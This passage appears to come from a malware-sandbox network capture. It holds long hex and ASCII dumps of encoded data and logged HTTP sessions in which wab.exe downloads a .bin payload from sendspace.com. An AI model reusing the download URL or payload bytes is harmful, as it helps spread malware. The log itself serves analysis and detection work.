                                                      2024-05-23 16:24:08 UTC15887INData Raw: 36 77 4c 56 66 33 45 42 6d 37 73 33 75 42 67 41 63 51 47 62 36 77 49 58 6c 51 4e 63 4a 41 52 78 41 5a 76 72 41 75 46 4a 75 55 59 2f 6c 64 6a 72 41 6a 51 50 63 51 47 62 67 63 45 43 42 57 66 35 36 77 4c 39 75 6e 45 42 6d 34 48 70 53 45 54 38 30 58 45 42 6d 2b 73 43 5a 34 70 78 41 5a 74 78 41 5a 75 36 58 48 4a 57 36 75 73 43 7a 6a 5a 78 41 5a 74 78 41 5a 74 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 4c 4c 43 4a 46 41 76 72 41 6d 34 71 36 77 49 75 66 4e 48 69 36 77 4c 51 33 58 45 42 6d 34 50 42 42 4f 73 43 42 4d 37 72 41 6e 63 74 67 66 6d 4a 71 6b 4d 46 66 4d 70 78 41 5a 74 78 41 5a 75 4c 52 43 51 45 36 77 4a 33 69 4f 73 43 56 56 69 4a 77 33 45 42 6d 2b 73 43 2b 6e 32 42 77 30 4e 34 49 77 4e 78 41 5a 74 78 41 5a 75 36 4c 4f 6d 32 4b 2b 73 43 42 74 64 78 41 5a 75
                                                      Data Ascii: 6wLVf3EBm7s3uBgAcQGb6wIXlQNcJARxAZvrAuFJuUY/ldjrAjQPcQGbgcECBWf56wL9unEBm4HpSET80XEBm+sCZ4pxAZtxAZu6XHJW6usCzjZxAZtxAZtxAZsxynEBm+sCLLCJFAvrAm4q6wIufNHi6wLQ3XEBm4PBBOsCBM7rAnctgfmJqkMFfMpxAZtxAZuLRCQE6wJ3iOsCVViJw3EBm+sC+n2Bw0N4IwNxAZtxAZu6LOm2K+sCBtdxAZu
                                                      2024-05-23 16:24:08 UTC16384INData Raw: 46 34 7a 35 7a 59 4b 51 4b 4d 51 5a 79 48 68 56 41 61 6b 75 69 54 34 41 57 2f 63 7a 6d 30 64 6d 7a 4c 68 53 5a 61 37 56 65 69 6e 6e 67 58 39 79 49 79 59 52 61 33 2b 79 6d 67 6d 63 7a 4e 68 49 31 65 67 64 50 73 4d 59 49 54 32 38 74 43 45 39 76 4c 51 68 50 62 79 30 49 54 32 38 74 43 45 39 76 4c 51 67 51 46 67 2b 70 38 51 63 62 78 6f 44 6b 6b 48 4e 4e 62 79 33 67 43 68 73 70 43 49 4d 32 43 48 47 75 66 78 32 2b 74 37 51 53 41 45 64 52 66 34 4b 78 58 39 71 65 2b 4d 53 4e 2f 77 51 4a 37 4d 54 41 33 34 6d 4d 51 73 36 54 64 48 4a 47 32 34 42 77 5a 33 54 6a 6e 50 72 56 6d 68 7a 65 47 47 45 52 63 49 6c 7a 58 47 6d 6f 4d 56 62 76 53 77 65 49 58 43 30 49 54 32 38 74 43 45 39 76 4c 51 68 50 62 79 30 49 54 32 38 74 43 45 39 76 4c 56 32 43 54 2f 6d 78 4a 4a 55 46 35 58
                                                      Data Ascii: F4z5zYKQKMQZyHhVAakuiT4AW/czm0dmzLhSZa7VeinngX9yIyYRa3+ymgmczNhI1egdPsMYIT28tCE9vLQhPby0IT28tCE9vLQgQFg+p8QcbxoDkkHNNby3gChspCIM2CHGufx2+t7QSAEdRf4KxX9qe+MSN/wQJ7MTA34mMQs6TdHJG24BwZ3TjnPrVmhzeGGERcIlzXGmoMVbvSweIXC0IT28tCE9vLQhPby0IT28tCE9vLV2CT/mxJJUF5X
                                                      2024-05-23 16:24:08 UTC16384INData Raw: 6a 79 54 36 4f 76 52 32 4a 2b 69 77 76 43 45 39 75 73 75 6c 71 50 35 56 33 49 74 7a 53 50 5a 63 74 6a 69 70 4b 4e 76 7a 6e 62 54 6d 78 67 61 6c 6d 4b 35 56 32 6b 56 67 52 42 65 78 65 58 64 39 6e 42 72 68 2b 45 49 31 69 72 56 31 53 56 34 33 6d 47 63 38 66 50 74 39 58 4a 56 75 65 33 55 64 35 38 54 76 4f 6b 63 4a 59 58 45 35 7a 69 54 49 66 35 68 68 50 62 79 4b 48 33 51 4d 70 43 42 65 6a 2b 67 42 50 36 55 6a 6a 63 34 71 4e 45 76 62 61 57 48 4a 31 75 61 61 34 6b 71 6b 76 74 7a 55 35 63 5a 4c 5a 4c 36 54 52 37 6a 34 57 76 51 78 74 4c 51 68 41 36 6d 6e 77 73 4a 44 68 44 32 75 6b 6a 59 4b 56 68 4a 43 4a 4b 69 7a 50 2f 74 53 73 31 71 30 41 67 57 74 70 71 67 37 71 62 6b 38 35 6b 33 62 6f 39 4f 79 4a 6f 58 39 52 79 4c 6e 75 36 78 34 62 4b 6d 69 4a 69 59 2f 67 31 36
                                                      Data Ascii: jyT6OvR2J+iwvCE9usulqP5V3ItzSPZctjipKNvznbTmxgalmK5V2kVgRBexeXd9nBrh+EI1irV1SV43mGc8fPt9XJVue3Ud58TvOkcJYXE5ziTIf5hhPbyKH3QMpCBej+gBP6Ujjc4qNEvbaWHJ1uaa4kqkvtzU5cZLZL6TR7j4WvQxtLQhA6mnwsJDhD2ukjYKVhJCJKizP/tSs1q0AgWtpqg7qbk85k3bo9OyJoX9RyLnu6x4bKmiJiY/g16
                                                      2024-05-23 16:24:08 UTC16384INData Raw: 6d 59 59 78 37 75 2f 4c 73 78 43 53 35 6a 64 70 44 53 58 44 69 70 75 6e 75 73 44 69 6a 66 56 42 50 70 49 56 6b 62 53 30 49 39 6a 39 41 42 46 73 2b 6c 49 38 70 44 7a 71 4a 6a 68 4e 64 37 47 62 75 33 48 43 49 36 75 65 4a 6a 75 72 64 4e 6a 73 35 73 59 47 70 62 69 4f 56 4b 65 72 31 66 30 6d 7a 56 4d 69 31 74 52 45 79 4a 4f 30 7a 65 34 30 6d 58 4c 68 56 74 6a 61 31 6b 37 6f 6a 47 42 73 30 4b 36 78 33 30 38 6e 6e 6f 45 6a 67 38 66 30 31 6c 67 39 33 76 33 4f 4d 68 7a 59 69 43 56 66 4d 4c 51 68 50 62 79 30 49 54 32 38 74 43 45 39 76 4c 51 68 50 62 79 30 49 54 32 38 74 57 2f 6d 74 53 58 49 44 65 2b 6b 55 71 44 65 67 67 63 62 61 39 78 66 4b 56 4c 30 67 7a 70 36 7a 6a 31 47 56 65 37 62 35 45 79 2b 57 7a 6f 47 44 51 4a 6d 61 72 4d 37 55 74 30 5a 6a 7a 70 6c 44 53 63
                                                      Data Ascii: mYYx7u/LsxCS5jdpDSXDipunusDijfVBPpIVkbS0I9j9ABFs+lI8pDzqJjhNd7Gbu3HCI6ueJjurdNjs5sYGpbiOVKer1f0mzVMi1tREyJO0ze40mXLhVtja1k7ojGBs0K6x308nnoEjg8f01lg93v3OMhzYiCVfMLQhPby0IT28tCE9vLQhPby0IT28tW/mtSXIDe+kUqDeggcba9xfKVL0gzp6zj1GVe7b5Ey+WzoGDQJmarM7Ut0ZjzplDSc
                                                      2024-05-23 16:24:08 UTC16384INData Raw: 73 4a 67 78 50 68 39 4e 46 54 32 39 37 74 71 67 4a 35 34 54 4f 71 62 7a 49 49 31 4b 73 2f 6a 71 31 38 52 37 4f 6d 61 35 33 69 78 32 73 35 73 48 75 41 71 59 59 38 36 54 76 54 6c 69 77 62 6e 61 6b 56 42 76 69 76 30 54 62 6b 35 68 77 4a 50 7a 5a 53 73 47 41 45 45 58 65 69 48 52 71 44 44 58 70 2b 6c 63 6b 59 79 2f 6f 79 30 4b 2f 55 73 75 59 63 6d 37 4f 6b 52 78 33 45 54 69 53 4e 49 44 53 55 6f 6d 49 6c 6a 2b 4d 78 65 37 71 51 51 37 35 44 34 6d 67 45 51 2f 51 59 7a 2b 78 67 61 39 6d 46 5a 56 33 76 46 67 4f 49 49 6e 31 4d 62 69 37 62 4b 30 4a 56 4e 62 4d 35 56 4d 56 79 4f 75 78 50 48 76 71 67 38 70 59 68 6a 54 41 50 45 7a 55 36 4f 44 6a 78 43 4e 37 42 35 57 4f 47 31 67 6e 4d 66 2b 4d 6d 47 55 55 57 6a 64 4c 4d 5a 38 77 49 67 6c 2b 4d 43 30 49 54 32 38 74 43 45
                                                      Data Ascii: sJgxPh9NFT297tqgJ54TOqbzII1Ks/jq18R7Oma53ix2s5sHuAqYY86TvTliwbnakVBviv0Tbk5hwJPzZSsGAEEXeiHRqDDXp+lckYy/oy0K/UsuYcm7OkRx3ETiSNIDSUomIlj+Mxe7qQQ75D4mgEQ/QYz+xga9mFZV3vFgOIIn1Mbi7bK0JVNbM5VMVyOuxPHvqg8pYhjTAPEzU6ODjxCN7B5WOG1gnMf+MmGUUWjdLMZ8wIgl+MC0IT28tCE
                                                      2024-05-23 16:24:08 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      2024-05-23 16:24:08 UTC16384INData Raw: 50 4f 56 30 71 48 31 66 63 41 78 46 76 68 33 45 2b 42 53 6f 4c 77 35 79 6a 46 75 52 48 55 4c 75 32 6a 42 4b 6b 7a 42 35 75 7a 70 57 77 68 78 63 4a 71 4d 4d 51 35 6d 67 41 51 47 35 77 43 45 39 76 4c 51 68 50 62 79 30 49 54 32 38 74 43 45 39 76 4c 51 68 50 62 79 30 49 54 7a 6f 46 69 53 65 6c 41 4c 77 38 31 6d 4f 63 42 57 65 75 47 52 6a 51 69 53 38 36 5a 61 7a 2f 6e 41 66 43 74 38 36 59 6a 5a 65 36 38 71 7a 2f 78 2b 56 50 53 63 36 59 38 4a 5a 43 42 71 51 2f 55 55 76 67 6f 31 2f 61 69 59 45 45 4d 52 31 52 4c 6f 30 4f 4a 4f 31 67 59 2b 64 6e 74 4f 5a 48 66 66 70 63 61 74 71 37 71 56 4c 56 7a 61 6a 46 72 4c 50 77 6b 62 74 39 4f 30 62 34 51 49 77 7a 45 44 6d 54 78 39 67 6f 6e 49 6d 35 33 33 57 73 6d 75 37 62 6b 44 6d 70 64 49 6d 35 6a 62 4c 4d 55 75 37 62 67 44
                                                      Data Ascii: POV0qH1fcAxFvh3E+BSoLw5yjFuRHULu2jBKkzB5uzpWwhxcJqMMQ5mgAQG5wCE9vLQhPby0IT28tCE9vLQhPby0ITzoFiSelALw81mOcBWeuGRjQiS86Zaz/nAfCt86YjZe68qz/x+VPSc6Y8JZCBqQ/UUvgo1/aiYEEMR1RLo0OJO1gY+dntOZHffpcatq7qVLVzajFrLPwkbt9O0b4QIwzEDmTx9gonIm533Wsmu7bkDmpdIm5jbLMUu7bgD
                                                      2024-05-23 16:24:08 UTC16384INData Raw: 73 56 67 74 50 59 43 33 51 32 57 38 74 43 45 39 76 4c 51 68 50 62 79 30 49 54 32 38 74 43 45 39 76 4c 51 68 50 62 33 76 69 52 65 45 49 4f 4e 6d 6e 71 51 77 75 48 7a 43 2f 2b 4b 30 67 58 52 59 34 6b 69 61 34 6c 70 75 4a 75 4c 44 35 6e 32 66 75 77 6f 58 43 57 59 4b 4a 6f 4e 57 34 50 36 44 6d 49 6a 4a 7a 74 41 65 51 2f 32 77 76 6c 69 6f 72 4d 39 68 4d 72 4d 45 33 67 33 58 6f 61 53 45 62 65 34 61 65 59 51 51 74 41 36 65 65 6b 2f 4e 50 44 6f 78 34 6e 37 66 54 45 4f 7a 72 49 41 37 6d 71 4e 56 4f 62 79 32 42 68 31 53 71 44 45 64 76 4c 59 50 4b 73 69 77 49 54 32 43 6f 35 72 57 51 30 73 51 31 47 55 31 6a 59 49 6f 44 4a 54 72 69 73 33 2b 6a 4b 74 6c 4a 48 65 63 4a 30 57 77 6f 4a 36 6f 44 72 4e 75 6b 63 2b 35 4f 65 39 66 65 67 75 68 37 4e 4f 6c 71 5a 54 2f 42 6c 68
                                                      Data Ascii: sVgtPYC3Q2W8tCE9vLQhPby0IT28tCE9vLQhPb3viReEIONmnqQwuHzC/+K0gXRY4kia4lpuJuLD5n2fuwoXCWYKJoNW4P6DmIjJztAeQ/2wvliorM9hMrME3g3XoaSEbe4aeYQQtA6eek/NPDox4n7fTEOzrIA7mqNVOby2Bh1SqDEdvLYPKsiwIT2Co5rWQ0sQ1GU1jYIoDJTris3+jKtlJHecJ0WwoJ6oDrNukc+5Oe9feguh7NOlqZT/Blh
                                                      2024-05-23 16:24:08 UTC16384INData Raw: 6d 7a 41 46 4f 38 6b 75 4e 74 78 51 6a 75 51 63 32 73 69 4e 4b 61 39 34 48 6d 4c 54 31 64 34 74 62 79 2f 47 6b 54 34 35 76 43 4d 46 50 72 58 32 76 63 56 2f 4b 74 58 53 4d 6f 44 64 39 67 38 72 50 4c 41 68 50 6b 46 67 73 4a 39 77 4d 6a 7a 37 75 47 53 77 49 4a 5a 72 35 48 64 55 62 77 5a 61 2b 72 4f 49 65 64 4e 4d 59 7a 6f 56 44 4e 7a 6e 4a 72 4f 49 34 41 6b 67 53 47 66 4f 6b 37 6b 35 35 73 44 47 34 47 6a 6f 57 39 75 74 33 68 67 4b 4b 4c 32 6a 65 33 64 64 30 38 30 33 61 45 46 37 45 46 66 68 44 4c 47 49 6f 68 6f 67 4f 53 6d 56 50 63 2f 79 6d 7a 4a 62 37 35 7a 78 4a 6e 72 77 6f 59 35 71 4a 6b 71 4b 49 73 74 39 7a 4d 59 34 31 72 43 52 72 4d 49 39 36 73 7a 32 58 76 6e 6f 54 2f 59 6d 39 47 73 72 6c 76 75 37 76 33 36 31 35 4a 59 6d 39 75 4b 66 6d 41 4f 37 66 52 58
                                                      Data Ascii: mzAFO8kuNtxQjuQc2siNKa94HmLT1d4tby/GkT45vCMFPrX2vcV/KtXSMoDd9g8rPLAhPkFgsJ9wMjz7uGSwIJZr5HdUbwZa+rOIedNMYzoVDNznJrOI4AkgSGfOk7k55sDG4GjoW9ut3hgKKL2je3dd0803aEF7EFfhDLGIohogOSmVPc/ymzJb75zxJnrwoY5qJkqKIst9zMY41rCRrMI96sz2XvnoT/Ym9Gsrlvu7v3615JYm9uKfmAO7fRX
                                                      2024-05-23 16:24:08 UTC16384INData Raw: 47 34 51 49 74 6f 4e 6e 46 49 75 76 44 73 77 58 38 56 44 64 46 31 7a 78 30 79 6c 31 52 45 43 50 78 59 30 66 46 73 4f 39 64 34 4f 36 79 61 31 2b 32 71 4c 6b 6a 30 67 6d 6a 7a 51 44 71 70 67 52 2f 65 43 74 36 79 68 5a 49 4b 46 6f 49 70 51 73 47 65 37 5a 73 36 49 36 59 7a 6f 46 6d 66 64 43 56 72 4f 61 58 66 79 6d 65 47 50 4f 6b 37 30 35 59 73 49 32 35 48 6a 66 42 43 47 77 79 34 61 62 45 5a 48 72 74 4e 6a 75 47 69 6e 53 6c 67 78 4a 2f 33 43 63 77 70 48 50 48 54 63 35 6f 79 57 5a 68 6c 63 72 50 6c 48 4a 58 64 34 4e 7a 4d 63 71 2b 4c 41 68 50 35 4b 6a 5a 54 6d 38 74 42 38 74 52 32 76 65 77 71 4b 68 54 54 57 38 74 32 45 41 63 4e 67 64 50 65 42 6f 49 54 32 38 74 43 45 39 76 4c 51 68 50 62 79 30 49 54 32 38 74 43 45 39 76 4c 51 67 47 6b 2f 38 5a 37 6e 59 44 39 47
                                                      Data Ascii: G4QItoNnFIuvDswX8VDdF1zx0yl1RECPxY0fFsO9d4O6ya1+2qLkj0gmjzQDqpgR/eCt6yhZIKFoIpQsGe7Zs6I6YzoFmfdCVrOaXfymeGPOk705YsI25HjfBCGwy4abEZHrtNjuGinSlgxJ/3CcwpHPHTc5oyWZhlcrPlHJXd4NzMcq+LAhP5KjZTm8tB8tR2vewqKhTTW8t2EAcNgdPeBoIT28tCE9vLQhPby0IT28tCE9vLQgGk/8Z7nYD9G


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.449739172.67.170.1054433688C:\Program Files (x86)\Windows Mail\wab.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-05-23 16:24:59 UTC175OUTGET /pro/dl/dvbcvt HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: www.sendspace.com
                                                      Cache-Control: no-cache
                                                      2024-05-23 16:25:00 UTC947INHTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 23 May 2024 16:24:59 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: SID=kasl9f49sokivj0jd0u0img0e2; path=/; domain=.sendspace.com
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      Location: https://fs12n1.sendspace.com/dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O56IZYhyIyj8AYTTQrAFgRDegJC3uAqa1Q9PBDCjLMiXqWcDpjy%2BKDTOGIdRE2tZ2cafwfBGs1opf%2Bon5rb1OM0WyoKSayZ9jnI%2FE2NKHNbuCzVEmddZGpLgdeS2PYLXb0XqcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8886663befd5c345-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-05-23 16:25:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.44974069.31.136.534433688C:\Program Files (x86)\Windows Mail\wab.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-05-23 16:25:00 UTC305OUTGET /dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Cache-Control: no-cache
                                                      Host: fs12n1.sendspace.com
                                                      Connection: Keep-Alive
                                                      Cookie: SID=kasl9f49sokivj0jd0u0img0e2
                                                      2024-05-23 16:25:01 UTC431INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 23 May 2024 16:25:01 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 106048
                                                      Last-Modified: Wed, 15 May 2024 07:56:05 GMT
                                                      Connection: close
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Content-Disposition: attachment;filename="TGFVxUhEOgecNvM13.bin"
                                                      ETag: "66446a95-19e40"
                                                      Accept-Ranges: bytes
                                                      2024-05-23 16:25:01 UTC15953INData Raw: 37 e1 a8 f8 f6 ea 28 77 76 6b 33 89 60 7f ec 8d 3b 84 30 97 60 26 4b 2a 67 6b 13 19 c3 e5 e3 c8 53 35 92 65 6c 04 18 4f 36 14 29 60 d8 f0 dd dd 27 dc 18 28 f6 29 80 9b 6f 6b 9c 79 9b 3b 27 a6 c5 d4 be 48 a3 14 6f 30 4d 6d 50 8d 73 b1 34 10 d5 7a 63 40 16 de f4 68 b2 f2 c0 46 da 46 be 27 1b d2 94 44 ff 00 3c 11 7b f5 25 2e af 3c a1 57 34 74 2b 3d c5 fd 31 52 7b f6 0b 53 4b d2 37 81 f7 60 fc b5 e7 9b 82 eb 22 d2 4d 4c 28 96 3b 68 e8 36 31 a7 a6 9e 9d 8d 03 5a a9 4b 4b 3b 7d 63 2e 85 68 b0 c6 e7 de dd 81 af 32 81 ea 91 42 8f 5e 55 4b e6 df 5d ba 73 7b 5f 8f 10 d6 be 65 70 60 fa 40 9c c6 77 50 d8 c8 83 57 bc d5 30 32 6d cd 44 41 b7 aa 04 4f 1f 9b 2d a3 8b e2 72 0d 4f 9f fd be e6 0c 73 1d 7d 43 a9 c3 99 3d a8 cd 18 23 5c 9f 1a 9b 1b bc fe f1 cb 98 38 8d fd d0
                                                      Data Ascii: 7(wvk3`;0`&K*gkS5elO6)`'()oky;'Ho0MmPs4zc@hFF'D<{%.<W4t+=1R{SK7`"ML(;h61ZKK;}c.h2B^UK]s{_ep`@wPW02mDAO-rOs}C=#\8
                                                      2024-05-23 16:25:01 UTC16384INData Raw: 65 c0 5c e2 ef 4e 34 9a 04 c5 a7 29 25 af b6 3d df c3 00 b9 02 01 80 39 7b ca 55 d8 09 82 e8 7d ca 77 a0 b3 f2 91 70 f0 a7 e4 b7 17 a6 e8 65 ab d5 23 dc a4 83 16 8c 0b a9 02 19 1c c7 cb 3b d7 29 24 aa a7 27 da 71 58 09 9f b1 f6 0c ce 63 ba 2d ca 35 73 9a 3b ed fc 55 3c bc 5f 7f 10 25 a8 67 5e e5 97 3f 45 0e a2 31 34 29 81 84 4e 4c ea cf f2 e9 4d 33 e5 28 36 79 a7 3e f3 19 36 f8 15 c1 55 55 b7 a0 3a e7 a8 a5 77 64 40 ca 20 d4 62 4a 7e ca 32 6b 3c 60 78 c7 c7 5c 45 09 fe 4d d6 54 02 05 2e 62 2c 55 a0 a1 f8 70 3e ef eb db d3 e2 42 e3 9e 5e 16 7f b2 65 80 26 1b d4 02 f2 5c 0a a4 4f 62 fd 6c 86 e4 4e 37 51 73 cc 5e f8 ff 64 19 9e 53 64 3b d4 fd 35 17 08 ff 8c 3b 78 22 bc d4 ae 6b 2b 71 1e f5 87 8e 1b db 36 11 60 c2 f3 99 98 a1 00 1c 57 57 24 cf 86 3d cb 29 be
                                                      Data Ascii: e\N4)%=9{U}wpe#;)$'qXc-5s;U<_%g^?E14)NLM3(6y>6UU:wd@ bJ~2k<`x\EMT.b,Up>B^e&\OblN7Qs^dSd;5;x"k+q6`WW$=)
                                                      2024-05-23 16:25:01 UTC16384INData Raw: 5b 72 1d 0b 14 a8 c3 13 6a a9 cd b8 74 5d 9f a0 cc 1a bc fe f1 cb 98 e8 da fc d0 9b fc d1 ff a1 24 45 de ba ac eb 6d 5f 19 05 47 76 85 e3 20 06 19 b9 31 a3 c4 45 75 21 b1 ec b6 a1 e0 69 a8 8f b4 9d 7d 87 67 cd db a5 91 de a4 d5 43 24 e0 c7 fd 01 90 cf 95 48 d3 5f 79 4b 0f 4e 4f d1 ef 30 9e ff 8f a0 42 04 61 b0 8c 39 5a a5 54 93 d0 9c 6c 29 0b 4f dd f2 97 5a 51 18 94 18 64 80 48 e9 36 8c 68 fe c2 d1 f2 18 12 8e 45 3e c6 c3 82 b2 68 58 ad 1b 6e ba bf 87 53 3e ea 0a 41 5d 1f bb e2 56 e5 5e b6 1d fc 01 4d a9 fb 96 b3 a4 54 b6 fe 80 85 c8 85 83 49 fb e0 86 5d e2 70 68 e9 20 42 6b 36 d2 28 f2 c4 d2 5e e9 8d 75 74 12 92 e3 8b 8c 51 21 38 b2 70 27 47 eb 96 00 44 37 62 d9 e5 6b 82 05 cd c3 43 85 12 6e 70 18 4a 57 d8 99 44 b6 c9 cb bb 99 97 f4 92 fa ce 2c 40 40 db
                                                      Data Ascii: [rjt]$Em_Gv 1Eu!i}gC$H_yKNO0Ba9ZTl)OZQdH6hE>hXnS>A]V^MTI]ph Bk6(^utQ!8p'GD7bkCnpJWD,@@
                                                      2024-05-23 16:25:01 UTC16384INData Raw: 38 d5 5c d7 9d e3 dc da 2d 9e a9 ad bc 86 80 07 da 7b 25 0b fd 9f f7 c1 e9 36 43 59 73 7a b2 93 aa 70 fa dc 1c 02 48 0b d4 96 ca 12 01 cc 02 7b fb a6 fb 9d b2 17 70 e6 d8 22 1c ab 69 53 5a dd a4 a6 13 4b 13 04 62 4d 64 da 23 5c 15 53 65 8c d1 0d a0 9d ec 09 23 32 8b 11 2e c0 c8 ad 17 b4 7d b8 9e 4a ab 53 8d 15 81 a9 bd c1 e5 92 80 94 f0 71 1a e0 f4 8b eb f7 26 33 4d 17 56 61 69 23 f7 b8 53 d7 ef 8c b3 b6 ef 89 1a 68 b7 4a 0a 1e 72 b6 11 f6 8c a8 34 1c e7 9e c6 35 a1 90 52 c0 10 86 92 bb 9d f4 33 3c 72 3c 17 76 f9 04 a2 54 07 69 a8 d0 33 36 be ef 63 c2 e5 6e a4 52 ee bf a8 3c bc 64 0f 39 a8 74 04 cd 30 43 03 0d 5b c1 99 ee 9d 6c e0 31 1f f6 9a 7d 1d 5b e1 b9 d9 30 26 9f 1a fc 39 00 b6 43 15 08 0f f9 63 06 32 94 9a 94 51 f3 a4 cd 60 5c 96 9d d8 33 28 68 55
                                                      Data Ascii: 8\-{%6CYszpH{p"iSZKbMd#\Se#2.}JSq&3MVai#ShJr45R3<r<vTi36cnR<d9t0C[l1}[0&9Cc2Q`\3(hU
                                                      2024-05-23 16:25:01 UTC16384INData Raw: 7c 46 31 b0 fb d5 b0 04 2d ce 5c 49 d6 ca f3 de 76 af 86 56 a6 bb 7a dd ae 65 7a 1f 6b e6 ce 10 0b b5 72 d8 28 8a 26 2b 75 c8 87 52 11 42 dd 08 5e 47 f3 9a e6 b5 88 05 97 c2 84 54 73 dd ba 7a d4 1f 0e 47 48 bd 8e ab 36 05 28 ca 30 35 f2 61 3e d9 9d 14 7b 5d 74 ad c9 d2 a2 df 93 f8 6d 98 a3 ec 8b b9 76 b1 7f 0b 7d 7f 34 fb c8 75 ab 47 d5 ac 06 d8 43 ba c7 71 82 1b 88 c3 bf 57 45 2c c0 50 4a c3 3e 07 29 8f 40 41 e4 06 55 b7 d7 04 9d 67 c8 84 6a 87 56 2e dc ae 19 21 07 fa 46 61 ec 07 7b 90 7b 03 57 c1 ce 4e 50 52 f2 24 51 29 79 2c cf 74 a2 7c de 6d ac f2 4f 05 c2 bf 90 f2 1e b8 e4 ac 08 f9 26 3e dc f0 6b c3 1c 6f 87 23 c5 50 b4 9a fe 5f 46 96 78 42 5a ae 70 ee 76 b9 3a 3f 78 08 b3 33 fd a3 df 4c e0 92 ed 9f 21 48 01 7a 0d 69 2a d7 98 38 cc d2 0a a5 f2 b9 ea
                                                      Data Ascii: |F1-\IvVzezkr(&+uRB^GTszGH6(05a>{]tmv}4uGCqWE,PJ>)@AUgjV.!Fa{{WNPR$Q)y,t|mO&>ko#P_FxBZpv:?x3L!Hzi*8
                                                      2024-05-23 16:25:01 UTC16384INData Raw: c8 0e 82 04 e5 4c 2c e6 75 28 32 76 5d 98 ba 99 40 13 44 8c de ec e9 58 e0 89 a1 69 2d 42 a0 8b 2a b9 48 dc 7b 67 0e 37 9f 00 d8 0d 1d ed de bf 3a 99 af 28 d7 de b7 cf 38 7c d3 ab 6a 8e 81 88 6b 27 83 aa 50 ac af 24 22 a9 56 a0 53 4b 02 fa 8a 2b 62 ed 7f 6d 34 34 a9 31 a0 82 5d 78 3b 11 f0 0a 0e f4 4e b7 67 6f 4a 98 a7 7a 97 8e 58 02 dc e4 c2 e2 09 2a 6b 06 c6 7c 58 61 6c 85 20 eb a9 0d aa a6 58 89 da af 8d e1 c1 a3 bf 2a 11 bb ff ff a0 81 94 8b a4 17 99 d7 1b 0c 42 56 dc 97 9c 95 43 02 07 9f c6 d5 75 49 00 0e 17 93 d3 a4 51 a7 fd 54 e8 4a 2f 60 f2 72 b6 73 cc b2 e3 43 44 c1 37 14 5c 5c f6 9e 07 ad 83 2b 5f e2 26 fe b5 7a a1 f0 37 a5 24 16 c5 71 66 ea 8b 15 d6 da 4c f4 3f a4 67 e9 81 f0 d4 7f b2 a2 51 96 30 58 7d 13 82 6b 81 2b 45 79 52 98 98 4b 2b 4c 9c
                                                      Data Ascii: L,u(2v]@DXi-B*H{g7:(8|jk'P$"VSK+bm441]x;NgoJzX*k|Xal X*BVCuIQTJ/`rsCD7\\+_&z7$qfL?gQ0X}k+EyRK+L
